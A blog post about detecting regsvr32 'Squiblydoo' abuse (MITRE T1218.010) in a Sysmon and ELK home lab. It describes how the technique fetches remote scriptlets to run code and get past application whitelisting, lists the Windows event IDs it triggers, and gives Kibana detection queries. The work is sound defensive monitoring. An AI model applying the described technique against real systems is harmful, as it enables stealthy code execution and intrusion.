Today I wanted to write a quick blog post on how you can detect, with free and open source tools, attackers using regsvr32.exe to download scriptlet files on remote servers to get code execution in your environment.
First, I will cover how I setup my environment. It is a pretty basic environment, I have a Windows domain consisting of 1 Domain Controller, 2 workstations and a Xubuntu machine running the ELK Stack. On the workstations I have Sysmon installed through Group Policy and PowerShell module logging and PowerShell script block logging enabled. Additionally, I am using Winlogbeat to ship the event logs to Logstash which then sends it to Elasticsearch for collection.
Now that I have explained a little bit of how my environment is setup lets take a look at what T1218.010 – regsvr32 is.
According to Red Canary, “Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a “Squiblydoo” attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)”
So the way I had my environment setup the event ID’s that fired for this attack were:
- Sysmon Event ID 1 – Process Create
- Sysmon Event ID 3 – Network Connnection
- Sysmon Event ID 22 – DNS Query
- Windows\PowerShell\Operational Event ID 4104 – PowerShell ScriptBlock Logging
Here is a screenshot of the command I ran on the Windows Workstation. Basically, regsvr32 goes out remotely to github to retrieve the scriptlet file which executes calc.exe on the workstation.
Here are my Kibana queries:
- winlog.event_id:1 AND winlog.event_data.ParentImage:”~regsvr32.exe”
- winlog.event_id:* AND winlog.event_data.Image:”~regsvr32.exe” AND (winlog.event_data.ParentImage:”~cmd.exe” OR winlog.event_data.ParentImage:”~powershell.exe”)
So in conclusion, setting up basic detections with free and open source tools can be achieved on a budget. Also, it is important to know your environment, if administrators are slinging regsvr32 all over your environment it could be difficult to detect this attack and will require more filtering perhaps through your Sysmon configuration or at your Logstash server. Until next time…